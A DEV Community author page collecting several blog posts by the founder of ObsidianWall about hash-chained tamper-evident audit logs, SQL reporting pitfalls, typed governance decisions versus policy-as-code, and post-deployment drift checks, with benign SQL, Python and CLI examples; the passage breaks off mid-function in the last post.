DEV Community: Aisha

Designing a Tamper-Evident Audit Ledger (Without Blockchain)

Aisha — Thu, 23 Jul 2026 09:00:00 +0000

We build governance software — tools that decide whether an infrastructure change should be allowed to deploy. Every decision gets logged locally so you can go back later and figure out why something was allowed, or who signed off on it.

Here's a question that logging by itself doesn't answer though: how do you actually know the log hasn't been quietly edited after the fact?

Turns out lots of systems log events. Way fewer make those logs something you can actually trust.

What we started with

Nothing fancy. One table for decisions. Then separate tables for overrides, approvals, and outcomes, because those felt like different things at the time.

It worked fine for a while, honestly.

Where it started falling apart

The problem showed up once we needed to add a new kind of event. Three tables meant three schemas to touch every time. Drift detection? New table. Evidence re-verification? Another one. It wasn't unworkable, just annoying in a way that kept getting worse.

Nothing stopped a row from being edited directly. If someone flipped an approved flag from false to true straight in the database, nothing would notice or care. The log recorded what happened. It didn't protect any of it.

The queries on top of it had real bugs. A LEFT JOIN between decisions and their follow-up events meant a decision with more than one follow-up got counted twice inside a SUM() — we actually saw a denial-rate report print 101.2%, which, obviously, isn't a real number. Separately, a migration that added a few new columns via ALTER TABLE left every row that existed before that migration with NULL in them, because ALTER TABLE ADD COLUMN doesn't backfill anything. Old records just quietly dropped out of reports that depended on those columns. No error. Just wrong numbers sitting there looking normal.

None of this was exotic. It's what happens to a table that grows one feature at a time without anyone stepping back to look at the shape of it.

What we changed

We merged the three event tables into one append-only history table. Every subsequent thing that happens to a decision — someone requesting an override, someone approving it, drift getting detected — becomes a new row. Nothing ever gets updated in place.

CREATE TABLE governance_history (
    history_id        TEXT PRIMARY KEY,
    record_id         TEXT NOT NULL,
    history_category  TEXT NOT NULL,  -- override | approval | outcome | drift
    history_action    TEXT NOT NULL,  -- requested | approved | denied | detected
    history_hash      TEXT NOT NULL,
    prev_history_hash TEXT,           -- chains to the previous entry
    created_at        TEXT NOT NULL
);

Category plus action, instead of one flat event-type string. Every new event kind we've added since — drift, evidence, whatever comes next — just fits into those two columns. Querying "every override-related thing that ever happened" is WHERE history_category = 'override'. No growing list of special-cased event names to keep updating.

Every row is chained to the row before it. history_hash is a SHA-256 of that row's data, and prev_history_hash holds the previous row's hash for the same record, basically the same trick git uses for commits. Touch an old row, and every hash after it stops lining up.
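Here is a minimal Python sketch of that chaining idea, not the actual ObsidianWall code. The helper names (row_hash, append_entry, first_broken_index) are hypothetical, and the sketch assumes the previous hash is folded into each row's hashed payload, which is what lets an edit to an old row surface during verification.

```python
import copy
import hashlib
import json
from typing import Dict, List, Optional

# Columns covered by the hash (assumption: mirrors the table above).
FIELDS = ("record_id", "history_category", "history_action", "created_at")


def row_hash(entry: Dict[str, str], prev_hash: Optional[str]) -> str:
    """SHA-256 over the row's data plus the previous row's hash."""
    payload = {name: entry[name] for name in FIELDS}
    payload["prev_history_hash"] = prev_hash
    canonical = json.dumps(payload, sort_keys=True)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def append_entry(chain: List[dict], entry: Dict[str, str]) -> None:
    """Append only: link the new row to the hash of the current last row."""
    prev_hash = chain[-1]["history_hash"] if chain else None
    chain.append({**entry,
                  "prev_history_hash": prev_hash,
                  "history_hash": row_hash(entry, prev_hash)})


def first_broken_index(chain: List[dict]) -> Optional[int]:
    """Return the index of the first row that no longer verifies, or None."""
    prev_hash = None
    for index, entry in enumerate(chain):
        if (entry["prev_history_hash"] != prev_hash
                or entry["history_hash"] != row_hash(entry, prev_hash)):
            return index
        prev_hash = entry["history_hash"]
    return None


chain: List[dict] = []
for category, action in [("override", "requested"),
                         ("override", "approved"),
                         ("drift", "detected")]:
    append_entry(chain, {"record_id": "dec-1",
                         "history_category": category,
                         "history_action": action,
                         "created_at": "2026-07-23T09:00:00Z"})

tampered = copy.deepcopy(chain)
tampered[1]["history_action"] = "denied"  # edit an old row in place

print(first_broken_index(chain))     # None
print(first_broken_index(tampered))  # 1
```

If the editor also recomputes the tampered row's own hash, the mismatch moves to the next row, whose prev_history_hash no longer matches.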

We've been careful to call this tamper-evident, not cryptographically signed, because those are genuinely different claims. What we built tells you whether something changed after the fact. It doesn't prove who was allowed to change it, and it's not a signature. For a governance tool specifically, that distinction felt worth being precise about.

Why any of this matters

If a decision in your audit trail can be edited with nobody the wiser, it's not really evidence anymore — it's just something someone typed. The whole point of a trail like this is that someone with zero context can look at it later and trust it without having to trust whoever ran the system in the first place. A log you can quietly rewrite doesn't get you that. An append-only, hash-chained one does.

A few things we'd tell ourselves earlier

ALTER TABLE ADD COLUMN does not backfill anything unless you give the new column a DEFAULT. Without one, every row that existed before you ran that migration has NULL in the new column, forever, unless you go write a backfill pass yourself. We found this the annoying way: a report quietly excluding forty-some records and nobody noticing until the numbers looked slightly off.
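The effect is easy to reproduce with Python's built-in sqlite3 module. This is a sketch with a made-up decisions table and a hypothetical risk_level column, not our real schema.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE decisions (decision_id TEXT PRIMARY KEY, decision TEXT NOT NULL)"
)
conn.executemany(
    "INSERT INTO decisions VALUES (?, ?)", [("d1", "DENY"), ("d2", "ALLOW")]
)

# Migration: new column with no DEFAULT, so the two existing rows get NULL.
conn.execute("ALTER TABLE decisions ADD COLUMN risk_level TEXT")
conn.execute("INSERT INTO decisions VALUES ('d3', 'DENY', 'high')")

REPORT_SQL = "SELECT COUNT(*) FROM decisions WHERE risk_level != 'low'"


def count(sql: str) -> int:
    return conn.execute(sql).fetchone()[0]


total = count("SELECT COUNT(*) FROM decisions")
# NULL != 'low' evaluates to NULL, not true, so the old rows drop out silently.
reported_before = count(REPORT_SQL)

# The explicit backfill pass that the migration itself never ran.
conn.execute("UPDATE decisions SET risk_level = 'unknown' WHERE risk_level IS NULL")
reported_after = count(REPORT_SQL)

print(total, reported_before, reported_after)  # 3 1 3
```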

Watch out for LEFT JOIN combined with SUM(CASE WHEN...). Any join that can multiply rows will inflate a sum sitting on top of it. COUNT(DISTINCT ...) on the actual thing you're counting is usually what you want instead.
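A small sqlite3 sketch of the double counting, using hypothetical decisions and follow_ups tables. Decision d1 has two follow-up events, so the join emits it twice.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE decisions (decision_id TEXT PRIMARY KEY, decision TEXT NOT NULL);
CREATE TABLE follow_ups (record_id TEXT NOT NULL, history_action TEXT NOT NULL);
INSERT INTO decisions VALUES ('d1', 'DENY'), ('d2', 'DENY'), ('d3', 'ALLOW');
INSERT INTO follow_ups VALUES ('d1', 'requested'), ('d1', 'approved');
""")

# Counts joined rows, so d1 contributes twice.
naive_sql = """
SELECT SUM(CASE WHEN d.decision = 'DENY' THEN 1 ELSE 0 END)
FROM decisions d
LEFT JOIN follow_ups f ON f.record_id = d.decision_id
"""

# Counts distinct decisions, no matter how many follow-ups each one has.
distinct_sql = """
SELECT COUNT(DISTINCT CASE WHEN d.decision = 'DENY' THEN d.decision_id END)
FROM decisions d
LEFT JOIN follow_ups f ON f.record_id = d.decision_id
"""

naive_denials = conn.execute(naive_sql).fetchone()[0]
distinct_denials = conn.execute(distinct_sql).fetchone()[0]

print(naive_denials, distinct_denials)  # 3 2
```

Divide the naive figure by a distinct count of decisions and you get a rate that can exceed 100%.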

A running list of schema migrations needs its own discipline. We added a _MIGRATIONS list early on and then just... forgot to add to it the next few times we touched the schema, because nothing forced us to remember. Cheap fix. The habit was the actual problem.
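One way to turn the habit into a check, sketched here under assumptions: the shape of _MIGRATIONS (a list of SQL strings) and the helper names are hypothetical. It rebuilds a scratch schema from the list and flags any column in the live database that the list does not account for.

```python
import sqlite3
from typing import Set

# Hypothetical shape: an ordered list of SQL statements.
_MIGRATIONS = [
    "CREATE TABLE decisions (decision_id TEXT PRIMARY KEY, decision TEXT NOT NULL)",
    "ALTER TABLE decisions ADD COLUMN risk_level TEXT",
]


def table_columns(conn: sqlite3.Connection, table: str) -> Set[str]:
    # PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk).
    # The table name is interpolated, so only pass trusted names.
    return {row[1] for row in conn.execute(f"PRAGMA table_info({table})")}


def apply_migrations(conn: sqlite3.Connection) -> None:
    for statement in _MIGRATIONS:
        conn.execute(statement)


def undeclared_columns(live: sqlite3.Connection, table: str) -> Set[str]:
    """Columns present in the live table but absent from the migration list."""
    expected = sqlite3.connect(":memory:")
    apply_migrations(expected)
    return table_columns(live, table) - table_columns(expected, table)


live = sqlite3.connect(":memory:")
apply_migrations(live)
# Someone touches the schema by hand and forgets the list.
live.execute("ALTER TABLE decisions ADD COLUMN policy_path TEXT")

print(undeclared_columns(live, "decisions"))  # {'policy_path'}
```

Run as a test in CI, a non-empty result fails the build, which is the forcing function we were missing.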

Say exactly what you built. Tamper-evident and cryptographically signed sound similar and aren't. One tells you something changed. The other tells you who was allowed to change it. Worth being precise, especially if anyone's going to rely on the claim later.

Curious if anyone else has built something like this without pulling in a full ledger/blockchain dependency. Did you land on hash-chaining too, or take a different path entirely?

Policy-as-Code Gives You Pass/Fail. Governance Needs More Than That.

Aisha — Tue, 30 Jun 2026 10:00:00 +0000

Every time I show someone ObsidianWall Verdict, the first question is some version of: "how is this different from OPA?"

It is a fair question. So here is the honest answer — not a sales pitch, an architectural one.

Policy-as-Code does one thing extremely well

Open Policy Agent, HashiCorp Sentinel, Checkov — these tools evaluate structured data against a policy at a specific point in time and return pass or fail.

Input:   Terraform plan JSON
Policy:  Rego / Sentinel policy file
Output:  true / false

Fast. Deterministic. Battle-tested at scale. If you need raw evaluation logic, these are mature, capable tools. I am not arguing against them.

Where it stops being enough

Three things break down the moment policy evaluation has to operate inside a real organization instead of an isolated CI step.

Binary rigidity. A policy engine returns pass or fail. There's no native concept of "this needs approval but can proceed" versus "this is a hard stop." A mission-critical hotfix that trips a minor tagging rule just breaks the pipeline. No nuance.

No human context. The engine can't tell you who has authority to override a rule, why they did, or whether the right person signed off. An engineer drops a #ignore comment in code and that decision typically vanishes — no structured record of who made it or why.

Point-in-time blindness. Policy-as-Code checks a static file before deployment. It has zero visibility into whether the deployment actually succeeded or what the infrastructure looks like five months later. No reality evidence. No way to verify deployed state still matches what was authorized.

What I built instead

Verdict — ObsidianWall's evaluation engine — wraps the policy mechanic in four things a complete governance system actually needs.

Five-level typed decisions, not pass/fail:

ALLOW
ALLOW_WITH_NOTIFICATION
ALLOW_WITH_APPROVAL_REQUIRED
DENY_WITH_OVERRIDE
DENY

A failed condition doesn't have to mean a broken pipeline. It can mean a Slack notification to the budget owner, a required sign-off from security, or an explicit override path with a named authorized role.
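As a rough illustration, the five levels map naturally onto an enum. The level names come from the list above; the NEXT_STEP mapping and the is_hard_stop helper are hypothetical and only show how a caller could branch on a typed decision instead of a boolean.

```python
from enum import Enum


class Decision(Enum):
    ALLOW = "ALLOW"
    ALLOW_WITH_NOTIFICATION = "ALLOW_WITH_NOTIFICATION"
    ALLOW_WITH_APPROVAL_REQUIRED = "ALLOW_WITH_APPROVAL_REQUIRED"
    DENY_WITH_OVERRIDE = "DENY_WITH_OVERRIDE"
    DENY = "DENY"


# Hypothetical pipeline reactions, one per level.
NEXT_STEP = {
    Decision.ALLOW: "proceed",
    Decision.ALLOW_WITH_NOTIFICATION: "proceed_and_notify",
    Decision.ALLOW_WITH_APPROVAL_REQUIRED: "wait_for_sign_off",
    Decision.DENY_WITH_OVERRIDE: "blocked_until_authorized_override",
    Decision.DENY: "blocked",
}


def is_hard_stop(decision: Decision) -> bool:
    """Only a plain DENY has no path forward."""
    return decision is Decision.DENY


for level in Decision:
    print(level.value, "->", NEXT_STEP[level], "| hard stop:", is_hard_stop(level))
```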

Named accountability on every decision. Every override, approval, and exception gets written to an immutable audit artifact with a named person, a named policy, and a timestamp. That's the difference between a buried #ignore comment and a record an auditor can actually review six months later.

Technical Risk and Governance Risk as separate dimensions. A deployment can score Technical Risk 0 and Governance Risk Critical at the same time. A policy engine alone can't express that distinction — it only knows if the rule passed. Whether something is technically misconfigured and whether it violates an organizational obligation are genuinely different questions with different owners.
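A sketch of what keeping the two dimensions apart could look like in code. The field names, the 0-100 technical scale, the governance labels, and the thresholds are all assumptions for illustration, not Verdict's actual data model.

```python
from dataclasses import dataclass

# Hypothetical ordered labels for governance risk.
GOVERNANCE_LEVELS = ("none", "low", "medium", "high", "critical")


@dataclass(frozen=True)
class RiskAssessment:
    technical_risk: int   # assumed 0-100 score for misconfiguration
    governance_risk: str  # assumed label from GOVERNANCE_LEVELS


def needs_engineering_fix(assessment: RiskAssessment, threshold: int = 50) -> bool:
    return assessment.technical_risk >= threshold


def needs_governance_review(assessment: RiskAssessment, floor: str = "high") -> bool:
    levels = GOVERNANCE_LEVELS
    return levels.index(assessment.governance_risk) >= levels.index(floor)


# Technically clean, but it violates an organizational obligation.
assessment = RiskAssessment(technical_risk=0, governance_risk="critical")

print(needs_engineering_fix(assessment))    # False
print(needs_governance_review(assessment))  # True
```

A single pass/fail boolean would have to pick one of those two answers and discard the other.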

Pre-deployment and post-deployment, working together. Verdict evaluates before deployment. ObsidianWall's own Sentinel component (unrelated to the HashiCorp Sentinel mentioned above) verifies after. Together they check that operational reality stayed aligned with what was authorized, a gap that point-in-time evaluation can't see by design.

The actual relationship

              Human Intent
                   │
                   ▼
         ┌──────────────────┐
         │   ObsidianWall    │
         │  Governance Layer │
         │                   │
         │  Typed decisions  │
         │  Accountability   │
         │  Risk separation  │
         │  Post-deploy check│
         └─────────┬─────────┘
                   │
                   ▼
         ┌──────────────────┐
         │ Policy Evaluation │
         │  Mechanic Layer   │
         │                   │
         │  OPA / Rego, or   │
         │  ObsidianWall's   │
         │  native YAML      │
         └─────────┬─────────┘
                   │
                   ▼
          Terraform Plan /
          CloudFormation

A policy engine could sit underneath ObsidianWall as the evaluation mechanic — they're not mutually exclusive. ObsidianWall's native format is YAML rather than Rego, by design, to lower the barrier for security and platform teams who aren't policy-DSL specialists. But the architectural point stands regardless of which evaluation mechanic you use: ObsidianWall orchestrates accountability, risk separation, and verification. Policy engines provide the evaluation primitive underneath.

When you'd actually want which

Stick with raw Policy-as-Code if you need maximum flexibility in policy logic, your team already knows Rego, you only need pass/fail with no accountability layer, or post-deployment drift isn't in scope for what you're governing.

Reach for ObsidianWall if you need typed decisions beyond pass/fail, named accountability for overrides, compliance coverage mapping (HIPAA, SOC 2, CIS v8, NIST AI RMF), separation between technical misconfiguration and governance violations, or evidence that still holds up in an audit six months out.

Policy-as-Code gives you the technical ability to check a file.

What I'm trying to build gives you the institutional guarantee that the decision was accountable, the risk was understood in both technical and governance terms, the right people were notified, and the deployed reality still matches what was authorized.

Different questions. Not a competition.

ObsidianWall Verdict is open source. GitHub · PyPI · pip install obsidianwall-verdict

Why I Rewrote the Definition of Programmable Assurance

Aisha — Tue, 23 Jun 2026 10:31:14 +0000

Intent should align with outcomes.

It sounds obvious.

Yet most organizations have no reliable way to verify that it does.

Policies exist.

Controls exist.

Accountability often does not.

Evidence is fragmented.

The gap between intent and outcomes is where governance failures live.

Modern organizations run on software.

Infrastructure is programmable.

Identity is programmable.

Security is programmable.

AI systems are programmable.

Governance is not.

Programmable Assurance is the discipline of ensuring it is.

About three weeks ago I published a definition of Programmable Assurance that I was genuinely proud of.

Then I spent three weeks building, shipping, watching an AI independently discover and classify what I was building without being told what it was, and having a lot of uncomfortable conversations about what governance actually means to people who are not engineers.

I realized the definition was too small.

Not wrong. Too small.

The original definition described the mechanism.

The new definition describes the outcome.

Here is what I wrote in June:

"The discipline of expressing organizational intent as executable, verifiable, explainable, and continuously enforceable governance logic."

When I said that to engineers, they understood it immediately.

When I said it to a Chief Risk Officer, she heard "developer problem."

When I said it to a General Counsel, he asked if it was a compliance scanner.

That is not a communication problem.

That is a definition problem.

The original definition explained how Programmable Assurance works technically.

It did not explain what problem it solves organizationally.

The New Definition

Programmable Assurance is the discipline of continuously aligning intent with outcomes through executable governance, accountability, evidence, and feedback.

For those who want the full scope boundary:

Programmable Assurance is the discipline of making governance intent executable, continuously enforceable, and accountable — governing the organizational decisions, systems, and responses through which intent becomes reality, with evidence and feedback that close the gap between the two.

The shorthand explains the outcome.

The canonical definition explains the mechanism.

Both describe the same idea.

The problem Programmable Assurance solves is not fundamentally a technical problem.

It is an organizational one.

Why the Original Definition Was Too Narrow

The original definition treated intent as an engineering design pattern.

YAML conditions.

Policy DSL files.

Terraform plans.

That framing works when you are governing infrastructure.

It breaks the moment someone asks whether Programmable Assurance applies to an NDA policy, a procurement approval, or a board-level risk acceptance.

Those have no pipeline.

No condition expression.

No deployment.

But they still have intent.

They still have decisions.

They still have accountability.

And when they fail, someone still needs evidence of what happened.

The original definition excluded those cases by accident.

I had been so focused on the infrastructure use case — which is where my own implementation starts — that I wrote a definition for a product instead of a category.

That mistake compounds.

If the category definition is too narrow, every future expansion requires re-educating the market.

I would rather define it correctly once.

What Programmable Assurance Actually Argues For

Programmable Assurance is not a topology.

It is not a deployment model.

It is not a governance architecture.

It is a behavioral argument.

Whatever governance you have — wherever it lives — it should behave four ways.

Intent Must Be Executable

Governance that exists only as a document is aspiration, not governance.

Intent becomes governance when it can influence, constrain, verify, or record the behavior it governs.

For a security policy that might be a condition that evaluates before a deployment executes.

For a procurement policy it might be an approval gate.

For a board-level risk acceptance it might be a signed ledger entry recording who accepted the risk and when.

The form changes.

The requirement does not.

Enforcement Must Be Continuous

Annual audits tell you what happened.

They do not prevent what happens next.

By the time an auditor reviews a control, the violation has already occurred.

The breach has already happened.

The bill has already arrived.

Real governance operates at the speed of change.

It runs whenever relevant decisions occur.

Not months later.

Every Decision Must Be Accountable

This one is personal.

I have watched security teams get blamed for outcomes created by decisions that nobody documented.

The risk was raised.

Leadership declined to act.

The record disappeared into email threads.

Years later, when something went wrong, nobody could reconstruct who decided what.

Accountability is not blame.

Accountability is the record that connects intent to decision to outcome.

Without that record, governance becomes theater.

With it, governance becomes defensible.

Outcomes Must Feed Back Into Intent

Governance that does not learn eventually becomes wrong.

Organizations change.

Risk profiles change.

Regulations change.

Business priorities change.

A governance system that cannot observe outcomes has no mechanism for knowing when its assumptions no longer match reality.

The feedback loop is what keeps intent aligned with outcomes over time.

Without feedback, governance stagnates.

With feedback, governance improves.

The Scope Boundary

Programmable Assurance applies wherever organizational intent can be translated into governable decisions, evidence, accountability, and feedback.

It does not govern human free will.

It governs the systems and decisions that respond to, record, authorize, and account for human behavior.

A harassment incident cannot be prevented by software.

But the investigation workflow, the evidence chain, the accountability record, and the organizational response absolutely can be governed.

Those systems matter.

And they are governable.

The Founding Insight

The insight did not come from a single incident.

It emerged repeatedly across every layer I operated in.

Because of the nature of my work, I was often responsible for the entire lifecycle.

I helped establish intent.

I translated that intent into policies and controls.

I implemented those controls across cloud platforms and security systems.

I operated the environments those controls governed.

I investigated the outcomes when things failed.

And I was responsible for the financial consequences when they did.

Most people experience only one layer of that process.

An engineer sees implementation.

A compliance officer sees policy.

A security analyst sees findings.

A finance team sees costs.

I was moving between all of them.

And from every layer, I kept encountering the same failure in a different form.

As an engineer, I saw tools that reported what had already gone wrong.

The cloud bill arrived after the spend.

The breach notification arrived after the incident.

The compliance finding arrived after the audit.

Systems designed to monitor outcomes rather than prevent them.

As a security practitioner, I watched engineers encounter controls they did not understand.

A policy blocks a deployment.

The engineer sees friction.

They find a workaround.

The control fails not because it was wrong—but because it never explained why it existed.

Nobody told them the business reason, the regulatory obligation, or the financial consequence attached to disabling it.

A control that is enforced but not understood creates friction.

A control that is enforced and understood creates alignment.

When I was starting out, I wished someone had explained the why behind every enforcement.

That MFA was not just a configuration checkbox.

It was a regulatory obligation with financial exposure attached.

That understanding would have made me a better engineer faster.

It would have made compliance drift less likely.

As a policy author implementing controls in Microsoft Purview, Azure Policy, and Entra ID, I stopped one afternoon and asked a simple question:

Will any engineer who encounters this control know why it exists?

The answer was no.

And I realized something larger.

The intent was in SharePoint.

The policy was in Azure Policy.

The enforcement was in Entra ID.

The evidence was in Azure Monitor.

The budget controls were somewhere else entirely.

None of those systems had any awareness of the others.

No shared vocabulary.

No shared evidence.

No shared feedback.

Each system saw only its own slice of the picture.

Different systems.

Different layers.

Different problems.

The same underlying failure.

Organizations define intent in one place,

execute it somewhere else,

measure it somewhere else,

and explain it nowhere.

That is Governance Fragmentation.

That is the Intent-Reality Gap.

That is the problem that kept appearing from every angle, no matter which layer I was operating in.

The cloud bill was a symptom.

The bypassed control was a symptom.

The policy nobody could find was a symptom.

The risk acceptance nobody could reconstruct was a symptom.

The disease was always the same:

intent and outcomes were disconnected.

Programmable Assurance closes that gap.

Not with more policies.

Not with better dashboards.

With systems that connect intent to outcomes—and carry that intent all the way to the execution layer where it can actually change behavior—with evidence that proves it did.

The vision existed long before I had language for it.

The definition finally says it in a way that scales with it.

Aisha Ibrahim is the founder of ObsidianWall, building infrastructure for Programmable Assurance. obsidianwall.com

If you missed the original definition article, it is here.

I Built a Pre-Deployment Governance Tool. Here's What It Couldn't Answer.

Aisha — Mon, 08 Jun 2026 09:30:00 +0000

By Aisha Ibrahim
Founder, ObsidianWall

About three months into building ObsidianWall Verdict, I ran into a question I kept not being able to answer.

Verdict works well at what it does. You give it a Terraform plan and a policy, and it tells you whether the deployment should proceed — risk score, condition trace, full audit artifact. Deterministic. Explainable. Fast.

verdict evaluate \
  --plan   terraform_plan.json \
  --policy policies/cost/basic_budget.yaml \
  --role   engineer

DENY_WITH_OVERRIDE. Risk 75/100. Budget exceeded.

Clean output. Clear decision.

Except I kept thinking: then what?

The deployment got blocked. Did someone override it? Did they just deploy from a different terminal? Did the cost actually come in under budget when they eventually ran it? Did the policy even matter?

Verdict had no idea. It made a decision and moved on. That's a policy engine, not a governance system.

The gap nobody talks about

Most policy-as-code tools stop at pass/fail. Check runs, result comes back, pipeline continues or doesn't. That's where the category ends for most teams.

But the whole premise of what I'm building — Programmable Assurance — is that enforcement alone isn't assurance. Assurance means you can demonstrate that reality stayed aligned with intent over time. Not just at the moment of deployment. After it.

So I started building Sentinel.

Verdict's question: should this deployment be allowed?
Sentinel's question: did reality stay aligned after the decision was made?

Those sound similar. They're not.

The design problem I didn't see coming

My first draft of Sentinel required passing --policy on every scan:

verdict sentinel scan \
  --plan   terraform_plan.json \
  --policy policies/cost/basic_budget.yaml

Explicit. Works fine. Also wrong.

The problem isn't the UX. The problem is what question it's asking. When you require --policy, you're asking: which policy file should I use? But when you run Sentinel, the real question is: which governance decision am I verifying against?

Those are different questions. One is filesystem-centric. The other is governance-centric.

If a policy file gets moved, renamed, or updated between Verdict's evaluation and when Sentinel runs, you lose the connection. You're no longer comparing against the original decision — you're comparing against whatever the current policy says. That's not reality verification. That's just running Verdict twice.

The fix was small but it mattered architecturally. Store the policy path inside the governance decision record at evaluation time:

record_decision(
    result=result,
    plan_path=plan,
    policy_path=policy,  # now stored in decisions table
)

Now Sentinel loads the comparison decision from governance history, reads the stored policy_path, and uses that to re-evaluate the current plan. No --policy flag required.

verdict sentinel scan --plan terraform_plan.json

The governance record is the source of truth. Not the filesystem. The decision ID is the stable reference — not a file path that might change.
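To make the lookup concrete, here is a self-contained sketch using sqlite3. The table layout, the store_decision and latest_decision_for_plan helpers, and the rule "compare against the most recent decision for the same plan" are assumptions for illustration; the real record_decision call and Sentinel's selection logic may differ.

```python
import sqlite3
import uuid
from typing import Optional, Tuple

conn = sqlite3.connect(":memory:")
conn.execute("""
CREATE TABLE decisions (
    decision_id TEXT PRIMARY KEY,
    plan_path   TEXT NOT NULL,
    policy_path TEXT NOT NULL,
    decision    TEXT NOT NULL,
    created_at  TEXT NOT NULL
)
""")


def store_decision(plan_path: str, policy_path: str,
                   decision: str, created_at: str) -> str:
    """Persist the policy path alongside the decision at evaluation time."""
    decision_id = uuid.uuid4().hex[:8]
    conn.execute(
        "INSERT INTO decisions VALUES (?, ?, ?, ?, ?)",
        (decision_id, plan_path, policy_path, decision, created_at),
    )
    return decision_id


def latest_decision_for_plan(plan_path: str) -> Optional[Tuple[str, str, str]]:
    """Return (decision_id, policy_path, decision) for the newest record."""
    return conn.execute(
        "SELECT decision_id, policy_path, decision FROM decisions "
        "WHERE plan_path = ? ORDER BY created_at DESC LIMIT 1",
        (plan_path,),
    ).fetchone()


decision_id = store_decision(
    "terraform_plan.json",
    "policies/cost/basic_budget.yaml",
    "DENY_WITH_OVERRIDE",
    "2026-06-08T05:55:04",
)

# A later scan needs only the plan; the policy comes from the record.
found_id, policy_path, previous = latest_decision_for_plan("terraform_plan.json")
print(found_id == decision_id, policy_path, previous)
```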

What the output actually looks like

When nothing has drifted:

────────────────────────────────────────────────────────────────────────
  ObsidianWall Sentinel — Drift Detection Report
────────────────────────────────────────────────────────────────────────

  Decision:  5a6f5869  (2026-06-08 05:55:04)
  Policy:    basic_budget_verdict
  Plan:      samples/terraform_plan.json

  Decision Comparison
────────────────────────────────────────────────────────────────────────
  Previous:  ⚠️  DENY_WITH_OVERRIDE    risk: 75/100
  Current:   ⚠️  DENY_WITH_OVERRIDE    risk: 75/100

  Condition Comparison
────────────────────────────────────────────────────────────────────────
  budget_check    ✗ FAIL → ✗ FAIL    unchanged

  Outcome
────────────────────────────────────────────────────────────────────────
  ✅ No drift detected
  Recorded: no_drift

Pay attention to what gets recorded: no_drift. Not deployment_success.

That distinction is intentional. Sentinel at this stage has no cloud API access. It cannot know whether a deployment actually ran or succeeded. It only knows whether the governance state of the plan matches the previous evaluation. So it records what it can actually observe.

deployment_success would be a claim about what happened in production. Sentinel has no evidence for that claim. no_drift is a claim about governance state. That it can verify directly.

Small distinction. But this kind of precision is what separates a tool that's honest about its own limitations from one that manufactures confidence.
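The comparison behind that report can be sketched in a few lines. This is an illustration, not Sentinel's code: the Evaluation type, the drift_detected label, and the tag_check condition are hypothetical, and only no_drift comes from the output above. The function never returns deployment_success, because nothing it sees is evidence of that.

```python
from typing import Dict, List, NamedTuple


class Evaluation(NamedTuple):
    decision: str
    risk: int
    conditions: Dict[str, bool]  # condition name -> passed?


def drift_outcome(previous: Evaluation, current: Evaluation) -> str:
    """Report only what can be observed: did the governance state change?"""
    return "no_drift" if previous == current else "drift_detected"


def changed_conditions(previous: Evaluation, current: Evaluation) -> List[str]:
    names = sorted(set(previous.conditions) | set(current.conditions))
    return [name for name in names
            if previous.conditions.get(name) != current.conditions.get(name)]


previous = Evaluation("DENY_WITH_OVERRIDE", 75, {"budget_check": False})
same = Evaluation("DENY_WITH_OVERRIDE", 75, {"budget_check": False})
drifted = Evaluation("DENY", 90, {"budget_check": False, "tag_check": False})

print(drift_outcome(previous, same))          # no_drift
print(drift_outcome(previous, drifted))       # drift_detected
print(changed_conditions(previous, drifted))  # ['tag_check']
```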

Three evidence streams, not one

Building Sentinel forced me to think more clearly about the different kinds of evidence a governance system actually produces.

Decision Evidence is what Verdict creates — what was decided, why, with what risk score, based on which conditions.

Reality Evidence is what Sentinel creates — whether the governance state held after the decision was made. Did the plan drift? Did new failures appear?

Operational Evidence is what neither of them creates yet — whether the deployment actually succeeded or caused an incident in production. That requires cloud API integration and comes later.

Most governance tools collapse all three into a single log entry. "Passed." "Failed." Full stop.

Keeping them separate matters because they answer genuinely different questions. Once you have all three, you can start asking things that governance tooling almost never supports: Did the policies that denied deployments actually prevent incidents? Are there controls that get overridden constantly without any subsequent problems — suggesting they're miscalibrated? Which policies generate friction without generating safety?

That's governance intelligence. Not governance logging.

Where it stands

Verdict is live and open source. Sentinel MVP shipped this week. The audit output is starting to show evidence from multiple streams in one place:

Deployment Outcomes

no_drift              2
deployment_success    2

Two outcome types, two records each. Small numbers. But real evidence: not assumed outcomes, not synthetic telemetry. As that history grows, the insights engine stops guessing and starts reasoning from actual data.

The repo is at github.com/ObsidianWall/obsidianwall-verdict if you want to look at the implementation or try it against your own Terraform plans.

Defining Programmable Assurance

Aisha — Mon, 01 Jun 2026 08:07:00 +0000

By Aisha Ibrahim
Founder, ObsidianWall, building programmable governance infrastructure for cloud and AI systems.

For decades, organizations have relied on policies, standards, controls, audits, and governance processes to create assurance.

Assurance answers a simple question:

How do we know that what we intended is actually happening?

Traditionally, assurance has been manual.

Policies are written in documents.

Controls are implemented separately by engineering teams.

Auditors review evidence months later.

Exceptions are tracked in spreadsheets.

Approvals occur through emails and ticketing systems.

The result is a governance gap between intent and reality.

Organizations define what they want, but they often lack a reliable mechanism to continuously verify that reality matches that intent.

The Problem

Modern organizations operate through software.

Infrastructure is code.

Security controls are code.

Identity systems are code.

AI systems are code.

Yet governance remains largely document-driven.

This creates a fundamental mismatch.

Engineering operates at machine speed.

Governance operates at human speed.

The larger and more complex an organization becomes, the larger this gap grows.

What Is Programmable Assurance?

Programmable Assurance is the discipline of expressing organizational intent as executable, verifiable, explainable, and continuously enforceable governance logic.

Instead of relying solely on written policies and periodic audits, assurance becomes programmable.

Intent becomes code.

Controls become executable.

Decisions become deterministic.

Evidence becomes continuously generated.

Accountability becomes traceable.

Assurance is no longer a retrospective activity.

It becomes a runtime capability.

Core Principles

Programmable Assurance is built upon five principles.

1. Intent Must Be Executable

Policies should not exist solely as documents.

Organizational intent must be represented in a form that systems can evaluate automatically.

Examples include:

Cost governance
Security requirements
Compliance obligations
Identity controls
Data governance requirements
AI governance standards
Resilience objectives

2. Decisions Must Be Deterministic

Governance decisions should be explainable and reproducible.

Given the same inputs and policies, the system should produce the same outcome every time.
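A minimal sketch of what that property looks like in practice, assuming a simple budget rule. The function names are hypothetical. The evaluation is a pure function of its inputs, and a fingerprint of those inputs lets an audit record show that two runs saw the same data.

```python
import hashlib
import json


def evaluate_budget(current_spend: int, estimated_cost: int, budget_amount: int) -> str:
    """Pure function: no clock, no randomness, no network."""
    return "ALLOW" if (current_spend + estimated_cost) <= budget_amount else "DENY"


def input_fingerprint(**inputs: int) -> str:
    """SHA-256 over a canonical (sorted-key) JSON encoding of the inputs."""
    canonical = json.dumps(inputs, sort_keys=True)
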